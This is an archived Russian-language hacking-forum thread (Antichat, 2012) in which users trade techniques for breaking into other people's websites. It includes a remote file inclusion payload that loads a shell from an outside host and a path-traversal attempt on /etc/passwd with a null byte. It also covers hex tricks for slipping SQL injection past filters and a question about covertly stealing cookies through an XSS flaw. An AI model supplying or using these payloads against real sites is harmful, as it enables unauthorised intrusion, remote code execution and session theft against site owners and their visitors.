ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.08.2012, 12:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Помогите как инклудить при данной ошибке?
Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71
Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71
Warning: include() [function.include]: Failed opening 'G.php' for inclusion (include_path='.:') in /var/www/x/x/x/x/x/x/index.php on line 71
Ссылка такого вида:
http://site.ru/dir/index.php?print&id=669
изменяю '669' выдазит уже mysql ошибка ,а мне нужен очень инклуд
|
|
|
|
28.08.2012, 13:05
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
blesse, if allow_url_fopen != Off:
http://site.ru/dir/index.php?print&id=http://mysite.com/shell
|
|
|
28.08.2012, 19:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Сообщение от Skofield
Skofield said:
blesse
, if
allow_url_fopen
!= Off:
http://site.ru/dir/index.php?print&id=http://mysite.com/shell
вы думаете ,что я настолько глуп?
я же говорю
изменяю '669' вылазит уже mysql ошибка ,а мне нужен очень инклуд.
Может ошибка гдето в скпите и вообще нету инклуда тут?
|
|
|
|
29.08.2012, 02:10
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
2 o3,14um:
mysql hex -> unhex ( unhex(hexedstr) ), через php проходит в хексе, в мускуле как мы знаем преобразовывается, следовательно префикс должен порйти через фильтры в php. а -ля: +WHERE+table_name=0x707265665F7461626C(pref_tabl)
2 blesse:
Четко и ясно написано в error: INCLUDE. Из базы берется согласно идентификатору имя файла и инклудится. Теоретически, сформировав корректный mysql inject запрос, в поле вывода, которое подставляется в качестве аргумента в include, можно реализовать задуманное. Но во первых, поле может некорректно формироваться в следствие некоторых факторов при mysql-inj, к тому же эксепшены и тп могут явно подавлять последующий инклуд при некорректном mysql запросе и тп. Может быть такое что скуля сформирована, параметр в инклуд передается, но визуально это явно не отображается.
|
|
|
|
29.08.2012, 02:28
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Cennarios
2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет
|
|
|
|
29.08.2012, 03:30
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от Konqi
Konqi said:
Cennarios
2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет
Да, на самом деле. Не думаю что фильтр настолько туп ,чтобы вида (символ)pref_ пропускал ) Моя невнимательность.
|
|
|
|
29.08.2012, 12:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Нешел другой инклуд:
http://site/patch/index.php?X=G&F=blalalal
Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37
Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37
Fatal error: require() [function.require]: Failed opening required 'namesutf8-blalalal' (include_path='.:') in /x/x/x/x/x/x/index.php on line 37
как я понимаю тоже бесполезный?
при изменеии переменной в ошибке оставется часть namesutf8-
Т.Е. при http://site/patch/index.php?X=G&F=../../../../../../../../etc/passwd%00
вылазит:
Warning: require(namesutf8-../../../../../../../../etc/passwd)
|
|
|
|
29.08.2012, 16:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
3822
Репутация:
0
|
|
Античат, помоги.
Есть некая страница.
page.php?text=Тест
этот text параметр выводится на странице. XSS работает, пробовал alert.
Фильтрации нет вообще видимо.
Можно ли как то вставить туда php код?
|
|
|
|
29.08.2012, 16:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Сообщение от Manok
Manok said:
Античат, помоги.
Есть некая страница.
page.php?text=Тест
этот text параметр выводится на странице. XSS работает, пробовал alert.
Фильтрации нет вообще видимо.
Можно ли как то вставить туда php код?
Нет.
|
|
|
|
29.08.2012, 16:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
3822
Репутация:
0
|
|
Жаль. А что можно с этого полезного поиметь? Страница общедоступна.
Можно ли как то скрыто стянуть куки, если разместить этот юрл в айфрейме, например?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
